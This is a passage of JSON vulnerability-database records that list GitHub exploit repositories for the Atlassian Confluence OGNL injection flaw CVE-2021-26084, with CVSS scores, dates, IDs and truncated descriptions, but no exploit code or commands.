"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-13T21:41:32", "id": "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:15", "description": "# CVE-2021-2608...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T12:36:52", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-04T03:09:22", "id": "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-13T09:42:12", "description": "# CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL injectio...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-31T23:33:44", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-13T08:40:52", "id": "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:49:37", "description": "# CVE-2021-26084_PoC...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-18T07:33:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-01T09:03:37", "id": "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\nConfluence OGNL injection\n\nCVE-2021-26084 is an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-09T06:19:13", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-31T23:43:54", "id": "A9A21055-01FA-5B3E-84B3-E294A9641418", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:51:44", "description": "# CVE-2021-26084 patch \n\n CVE-2021-26084 patch provided by \"Co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-08T17:05:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-08T17:29:07", "id": "84D5F04A-0DDB-5788-8759-DA99D303B756", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:53:20", "description": "# CVE-2021-26084\nProof of concept for CVE-2021-26084. \n\nConfluen...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T15:19:19", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-05-25T14:48:53", "id": "BFA4DC64-759A-5113-842C-923C98D12B44", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-23T04:27:16", "description": "# CVE-2021-26084\nAtlassian Confluence CVE-2021-26084 one-liner ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T01:15:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-22T21:21:20", "id": "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:06", "description": "This is a quick and dirty poc, tuned for a specifc confluence in...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T12:04:09", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-11T18:14:44", "id": "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:58", "description": "# confluence-rce-poc\nSetting up ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-04T14:53:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-04T15:16:43", "id": "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\n<p align=\"center\">\n <img src=\"https://user-ima...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T13:32:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-23T04:56:52", "id": "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:43", "description": "# CVE-2021-26084\n\n- An OGNL injection vulnerability exists that ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-16T03:56:14", "id": "4A995433-D0C6-5BF7-9A78-962229397A7D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:37", "description": "# Confluence Server Webwork Pre-Auth OGNL Injection (CVE-2021-26...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-02T03:11:50", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-02T03:16:43", "id": "CE477D7E-7586-5C82-8DCC-033C48461E66", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:38:38", "description": "# CVE-2021-26084\nConfluence aut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T11:01:49", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T04:53:46", "id": "EF37F62F-1579-535A-9C3E-49B080F41CAC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:56:38", "description": "# CVE-2021-26084\n# confluence\u8fdc\u7a0b\u4ee3\u7801\u6267\u884cRCE\n\n## Code By:Jun_sheng @\u6a58\u5b50...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T03:07:28", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-02T13:22:29", "id": "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:56:51", "description": "# CVE-2021-26084\nCVE-2021-26084\uff0cAtlassian Confluence OGNL\u6ce8\u5165\u6f0f\u6d1e\n\nA...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-26T06:01:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-20T09:26:02", "id": "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-25T06:37:31", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-25T01:08:52", "id": "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-25T03:02:01", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-25T01:08:52", "id": "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:29:20", "description": "# Confluence_CVE-2021-26084\nRemote Code Execution on Confluence ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T12:19:53", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-26T06:18:41", "id": "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-27T08:30:10", "description": "# CVE-2021-26084 \n\n# Introduction\nThis write-up provides an over...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T23:24:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084"], "modified": "2021-11-23T15:51:23", "id": "CD8CABD7-BE65-5434-B682-F73ABA737C65", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "# CVE-2021-26084 \n\n# Introduction\nThis write-up provides an over...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": 